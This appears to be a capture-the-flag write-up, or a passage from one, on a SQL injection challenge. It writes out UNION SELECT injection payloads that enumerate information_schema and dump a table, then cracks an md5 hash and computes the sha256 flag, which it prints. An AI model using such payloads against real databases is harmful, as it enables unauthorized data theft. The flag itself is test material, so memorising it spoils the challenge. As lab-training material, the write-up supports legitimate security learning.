with the same sql injection we can get :

ID: 1 AND 1=2 UNION SELECT table_name, column_name FROM information_schema.columns 
First name: list_images
Surname : comment

ID: 1 UNION SELECT title,comment from Member_images.list_images 
First name: Hack me ?
Surname : If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46

1928e8083cf461a51303633093573c46 * md5 decode = albatroz

$> echo -n albatroz | shasum -a 256

flag => f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188
